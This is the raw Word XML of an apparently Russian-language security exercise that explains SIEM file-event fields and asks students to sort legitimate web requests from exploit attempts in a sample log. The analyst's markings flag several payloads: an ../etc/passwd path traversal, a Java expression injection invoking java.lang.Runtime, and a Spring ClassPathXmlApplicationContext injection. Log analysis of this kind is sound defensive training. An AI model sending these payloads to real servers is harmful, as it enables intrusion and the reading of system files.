          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B05FCD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r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>fileEventData.clientAppId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>=2634</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:rStyle w:val="apple-tab-span"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4D09CB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gramStart"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>fileEventData.managedDevice.managedDeviceId</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>=14</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2304489B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r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>fileEventData.managedDevice.name=gw1-module1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="525431B5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gramStart"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>fileEventData.SHAHash.SHAHashData.SHAHash</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>=CD22437892392E03BF5375B597AA77DE6F0E5D9F26B1832339B79DA19F050BF7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462935F8" w14:textId="096F656F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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>fileEventData.SHAHash.SHAHashData.fileNameOrDisposition</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>=Unknown</w:t>
      </w:r>
      <w:r w:rsidR="009F7CE7" w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7A0789" w14:textId="7092B40A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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>fileEventData.SHAHash.SHAHashData.disposition</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>=0</w:t>
      </w:r>
      <w:r w:rsidR="009F7CE7" w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009F7CE7" w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Это</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009F7CE7" w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009F7CE7" w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>указывает</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009F7CE7" w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009F7CE7" w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>на</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009F7CE7" w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009F7CE7" w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>расположение</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009F7CE7" w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009F7CE7" w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>файла</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6E56B1AB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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>fileEventData.SHAHash.SHAHashData.userDefined</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>=false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1552AF6D" w14:textId="77777777" w:rsidR="009F7CE7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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>fileEventData.fileType.fileTypeId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>=9</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:rStyle w:val="apple-tab-span"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D0A4E7" w14:textId="4711EA34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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>fileEventData.fileType.fileTypeName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>=PDF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6425C4D2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r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>fileEventData.accessControlPolicyRef=FB8E85A86E2111E8BF10C9DF28307955</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151A2B46" w14:textId="77777777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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>fileEventData.application.serviceId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>=836</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:rStyle w:val="apple-tab-span"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3866B1B6" w14:textId="56BC6922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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>fileEventData.application.serviceName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>=SMTP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DBABEC5" w14:textId="77777777" w:rsidR="009F7CE7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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>fileEventData.user.userId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>=9999997</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:rStyle w:val="apple-tab-span"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F76B97" w14:textId="017B9975" w:rsidR="00BA14AC" w:rsidRPr="00A04197" w:rsidRDefault="00BA14AC" w:rsidP="00BA14AC">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rStyle w:val="apple-tab-span"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>fileEventData.user.protocolRef</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F539FE8" w14:textId="0B70CD2B" w:rsidR="00BA14AC" w:rsidRPr="00A04197" w:rsidRDefault="00BA14AC" w:rsidP="00BA14AC">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>fileEventData.user.userName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>=No Authentication Required</w:t>
      </w:r>
      <w:r w:rsidR="009F7CE7" w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009F7CE7" w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>здесь</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009F7CE7" w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009F7CE7" w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>указывается</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009F7CE7" w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009F7CE7" w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>имя</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009F7CE7" w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009F7CE7" w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>пользователя</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009F7CE7" w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009F7CE7" w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>связанного</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009F7CE7" w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> с </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009F7CE7" w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>событием</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009F7CE7" w:rsidRPr="00A04197">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA8DA9B" w14:textId="77777777" w:rsidR="00BA14AC" w:rsidRPr="00A04197" w:rsidRDefault="00BA14AC" w:rsidP="006F14DE">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="456F0319" w14:textId="0EC3A564" w:rsidR="00EA0F9D" w:rsidRPr="00A04197" w:rsidRDefault="00EA0F9D">
      <w:pPr>
        <w:spacing w:before="240" w:after="24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0000009" w14:textId="7AE88624" w:rsidR="00F3678C" w:rsidRPr="00A04197" w:rsidRDefault="009F7CE7">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A04197">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">5.   </w:t>
      </w:r>
      <w:r w:rsidRPr="00A041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4197">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>В файле «Пример запросов.txt» отделить легитимные запросы от запросов, очевидно содержащих попытки эксплуатации известных уязвимостей. Написать IP адреса атакующих, какого класса уязвимости они пытались использовать.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000000A" w14:textId="77777777" w:rsidR="00F3678C" w:rsidRPr="00A04197" w:rsidRDefault="009F7CE7">
      <w:pPr>
        <w:spacing w:before="240" w:after="24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hyperlink r:id="rId15">
        <w:r w:rsidRPr="00A04197">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000EE"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Пример</w:t>
        </w:r>
        <w:r w:rsidRPr="00A04197">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000EE"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidRPr="00A04197">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000EE"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>запросов</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0000000B" w14:textId="77777777" w:rsidR="00F3678C" w:rsidRPr="00A04197" w:rsidRDefault="009F7CE7">
      <w:pPr>
        <w:spacing w:before="240"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92AB70" w14:textId="1A88EE99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um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44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95.82.73.234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1;+Redmi+Note+9S+Build/RKQ1.200826.002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&amp;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chant_id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010012500006866&amp;merchant_name=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5884101E" w14:textId="305E4EE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////////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7654C889" w14:textId="624EDA65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61D4730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DFCDF8B" w14:textId="73005916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78.88.52.243 10.17.8.22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/somedata/favorite-products/market/rest/customer/checkFavoriteProduct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+iPhone+OS+16_0_2+like+Mac+OS+X)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Mobile/15E14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f=startOurProductsMybottles&amp;startedFrom=services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14:paraId="10003E4C" w14:textId="72157BE2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3E8151" w14:textId="5564B2C3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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US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5012BB69" w14:textId="79AC89C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2E80F1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18885A" w14:textId="7462A660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78.88.52.24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0.18.140.2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som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mobile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1;+220333QAG+Build/RKQ1.211001.001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filter%5Borders%5D%5Bcode%5D=24365717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079596A2" w14:textId="68D29739" w:rsidR="009F7CE7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/////</w:t>
      </w:r>
      <w:r w:rsidR="00A04197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итимные запросы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F215EA" w14:textId="77777777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33A8A7" w14:textId="306DF187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f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76.64.33.15 10.18.140.21    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1;+220333QAG+Build/RKQ1.211001.001;+wv)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Version/4.0+Chrome/109.0.5414.117+Mobile+Safari/537.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f=startOurProductsMybottles&amp;startedFrom=services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04D7888F" w14:textId="5B9E987C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E4CB246" w14:textId="07E2F0AA" w:rsidR="00E671BF" w:rsidRPr="00A04197" w:rsidRDefault="00E671BF" w:rsidP="009F7C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2837658D" w14:textId="703FAA1C" w:rsidR="00E671BF" w:rsidRPr="00A04197" w:rsidRDefault="00E671BF" w:rsidP="009F7C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7F2A5" w14:textId="6AC24B0C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DA0534" w14:textId="223F8D33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ch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85.113.36.58 10.17.8.194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1;+CPH2067+Build/RKQ1.200903.002;+wv)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Version/4.0+Chrome/109.0.5414.117+Mobile+Safari/537.3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chant_id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01001250000738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7B18932C" w14:textId="78D30148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1E52290" w14:textId="49387B7F" w:rsidR="009F7CE7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eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>//////</w:t>
      </w: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итимные запросы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35FB1756" w14:textId="59D34F33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068384" w14:textId="5E6BCE72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88.124.232.149 1.2.5.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1;+Redmi+Note+9S+Build/RKQ1.200826.002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f=startOurProductsMybottles&amp;startedFrom=services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75A0714F" w14:textId="3AC605A5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4D7C02" w14:textId="5E37B658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43D5ED65" w14:textId="77777777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F040CF" w14:textId="0101128A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85.117.108.2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0.18.140.2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bpm/loan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EmsStatusAsync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+iPhone+OS+16_0+like+Mac+OS+X)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Mobile/15E14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filter%5Borders%5D%5Bcode%5D=24365717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2130D941" w14:textId="6A0B5107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F306AA6" w14:textId="3EC85B88" w:rsidR="009F7CE7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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>////</w:t>
      </w:r>
      <w:r w:rsidR="00A04197"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гитимные запросы </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0988B6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F32794" w14:textId="0F783015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p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78.88.7.190 10.2.50.2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Dalvik/2.1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;+Android+12;+CPH2385+Build/SP1A.210812.016)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chant_id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01001250000738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10D95DF0" w14:textId="7DF57E86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E03DFAD" w14:textId="2855F427" w:rsidR="009F7CE7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en-US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6866956F" w14:textId="427FA8B4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77D204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424591" w14:textId="05A8D993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84.252.158.200 1.2.5.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search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1;+220333QAG+Build/RKQ1.211001.001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f=startOurProductsMybottles&amp;startedFrom=services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39AF9B31" w14:textId="20E188E2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514B99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en-US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074D1707" w14:textId="77777777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737543" w14:textId="52CCDB2D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ket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45.255.172.223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+iPhone+OS+15_5+like+Mac+OS+X)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Mobile/15E14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f=startOurProductsMybottles&amp;startedFrom=services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18013C8B" w14:textId="027C6941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2CE1FAD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en-US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79DEA466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665DEA" w14:textId="6D55C953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ket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95.82.73.234 10.17.8.22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p/linea-8035154p-55-zoloto-100959802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+iPhone+OS+15_3_1+like+Mac+OS+X)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Mobile/15E14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chant_id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01001250000738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0F19780E" w14:textId="5F1F7126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8A1E354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en-US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5444A442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2DAAEE" w14:textId="685E4F91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maty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78.172.227.206 1.2.5.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+iPhone+OS+16_3+like+Mac+OS+X)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Mobile/15E14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ref=startOurProductsMybottles&amp;startedFrom=services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459AB8D3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051F547B" w14:textId="1DF8AE41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841B699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961EEF" w14:textId="2078BBB1" w:rsidR="0078490A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-02-1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um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4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79.133.190.153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hboard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hboar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zilla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13,4+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k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+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leWebKi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605.1.15+(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HTML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+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k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cko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+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1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4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_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fp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3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true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6_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gelabel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3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homepage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%2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dl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3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com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a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package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ringframework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por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sspathxmlapplicationcontex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8%2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8.8.8%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7225%22%2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</w:p>
    <w:p w14:paraId="52C5495F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2104C18" w14:textId="66107581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////запрос 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port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sspathxmlapplicationcontex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8%2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8.8.8%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7225%22%29</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE9C165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DA9BE44" w14:textId="0C2D82CE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com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49.27.81.11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2/order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2;+2201116TG+Build/SP1A.210812.016;+wv)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Version/4.0+Chrome/109.0.5414.118+Mobile+Safari/537.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age%5Bnumber%5D=1&amp;page%5Bsize%5D=100&amp;filter%5Borders%5D%5Bstate%5D=ARCHIVE&amp;filter%5Borders%5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7E0DE968" w14:textId="5EA97550" w:rsidR="0078490A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//</w:t>
      </w:r>
      <w:r w:rsidR="00A04197"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егитимные запросы </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F19FD8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F4FEB6" w14:textId="76C02C38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78.109.191.117 10.2.50.2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 /page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login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2;+SM-A315F+Build/SP1A.210812.016;+wv)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view%3D..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpassw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168D3E3B" w14:textId="270A07CD" w:rsidR="0078490A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////////////запрос</w:t>
      </w:r>
      <w:r w:rsidR="00A04197"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можно хотели узнать </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00A04197"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оль</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A04197"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w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.%2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tc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passwd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</w:p>
    <w:p w14:paraId="40CC8B53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DC54F3" w14:textId="43992909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um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79.133.190.153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+iPhone+OS+13,4+like+Mac+OS+X)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Mobile/15E14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f=startOurProductsMybottles&amp;startedFrom=services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65C822AC" w14:textId="49E7099C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693C7B2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3F687971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B3B708" w14:textId="2607C0BD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esa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09.229.185.239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+iPhone+OS+16_1_1+like+Mac+OS+X)+AppleWebKit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605.1.15+(KHTML,+like+Gecko)+Mobile/15E148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&amp;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chant_id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010012500006866&amp;merchant_name=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1279E097" w14:textId="68A9B0BC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E609FAC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50EDF8C2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81960E" w14:textId="546D09DC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d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49.27.58.15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p/linea-8035154p-55-zoloto-100959802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+iPhone+OS+14_8_1+like+Mac+OS+X)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Mobile/15E148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f=startOurProductsMybottles&amp;startedFrom=services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0BDA898A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76201F86" w14:textId="49665961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67FC842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668382" w14:textId="1F328D01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d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85.229.86.5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.2.5.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8.0.0;+ATU-L31+Build/HUAWEIATU-L31;+wv)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Version/4.0+Chrome/109.0.5414.117+Mobile+Safari/537.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chant_id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01001250000738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7158311B" w14:textId="5F60DF8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9DB36F1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226C2EAA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CFE5B3" w14:textId="2B46E376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um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91.246.194.30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3;+SM-S901B+Build/TP1A.220624.014;+wv)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Version/4.0+Chrome/109.0.5414.117+Mobile+Safari/537.3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filter[orders][code]=24238931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346F7C62" w14:textId="514852A2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3830373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7CC636EA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ABC4D8" w14:textId="34037CCA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ttles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46.42.248.9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0.2.50.2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+iPhone+OS+16_3+like+Mac+OS+X)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Mobile/15E14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chant_id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01001250000738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04D72C46" w14:textId="4DCA3991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9D7A427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620F5C18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AB4A83" w14:textId="024CFE8E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85.117.110.230 1.2.5.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2/order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;+Windows+NT+6.0;+en-US)+AppleWebKit/530.0+(KHTML,+like+Gecko)+Chrome/2.0.160.0+Safari/530.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f=startOurProductsMybottles&amp;startedFrom=services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5ECE4E66" w14:textId="2BA27D78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0C13585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13B429FB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567EB3" w14:textId="01BB3D4E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me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82.200.168.92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p/linea-8035154p-55-zoloto-100959802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2;+SM-A135F+Build/SP1A.210812.016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source=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kz&amp;ref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tOurProducts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072B98E1" w14:textId="3F2F28DA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EBBFCC5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0F3EFEA7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7745B94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475D36" w14:textId="65EA08A1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81.91.187.5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0.2.50.2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9;+TECNO+CC7+Build/PPR1.180610.011;+wv)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Version/4.0+Chrome/101.0.4951.41+Mobile+Safari/537.36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chant_id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01001250000738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5E59F219" w14:textId="3BA996ED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CDD02F0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740FE6E0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CFC5B2" w14:textId="211904FB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81.91.187.5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0.2.50.2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hboars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9;+TECNO+CC7+Build/PPR1.180610.011;+wv)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Version/4.0+Chrome/101.0.4951.41+Mobile+Safari/537.36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actionoutcome%3D%2Fpwn.xhtml%3Fpwned%3D%23%7Bexpressions.getclass%28%29.forname%28%27java.lang.runtime%27%29.getdeclaredmethods%28%29%5B0%5D%7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57E0D059" w14:textId="14282474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30B292A" w14:textId="341C2DBC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///////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рос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ionoutcome%3D%2Fpwn.xhtml%3Fpwned%3D%23%7Bexpressions.getclass%28%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forname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%28%27java.lang.runtime%27%29.getdeclaredmethods%28%29%5B0%5D%7D</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007F4183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E018C6" w14:textId="2D00FA89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s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85.57.72.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Windows+NT+6.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W64)+AppleWebKit/535.11+(KHTML,+like+Gecko)+Chrome/17.0.963.56+Safari/535.1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f=startOurProductsMybottles&amp;startedFrom=services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1998193D" w14:textId="7B0CF25D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5C65DEC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3ABAE0FE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235F57" w14:textId="2E56549B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t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88.124.244.58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2/order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1;+SM-N970F+Build/RP1A.200720.012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filter%5Borders%5D%5Bcode%5D=24365717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40F87A1A" w14:textId="17710F5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766328D" w14:textId="13496623" w:rsidR="0078490A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////////</w:t>
      </w:r>
      <w:r w:rsidR="00A04197" w:rsidRPr="00A041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гитимные запросы </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5636416D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0D464E" w14:textId="56AE4308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47.30.103.209 10.2.50.2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hone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+iPhone+OS+16_2+like+Mac+OS+X)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Mobile/15E14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-RU&amp;code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&amp;query=%D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764E74C0" w14:textId="760DEB11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EFFDE32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7F5C619" w14:textId="32AC2F8E" w:rsidR="0078490A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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/////////</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04197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</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0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-RU&amp;code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&amp;query=%D0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588F03CF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76E15C" w14:textId="77777777" w:rsidR="00A04197" w:rsidRPr="00A04197" w:rsidRDefault="009F7CE7" w:rsidP="00E671B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ch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85.57.73.176 10.17.8.22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3;+2109119DG+Build/TKQ1.220829.002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source=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kz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08FBD0C0" w14:textId="7FB0E610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en-US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</w:t>
      </w:r>
      <w:r w:rsidRPr="00A041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запросы</w:t>
      </w:r>
    </w:p>
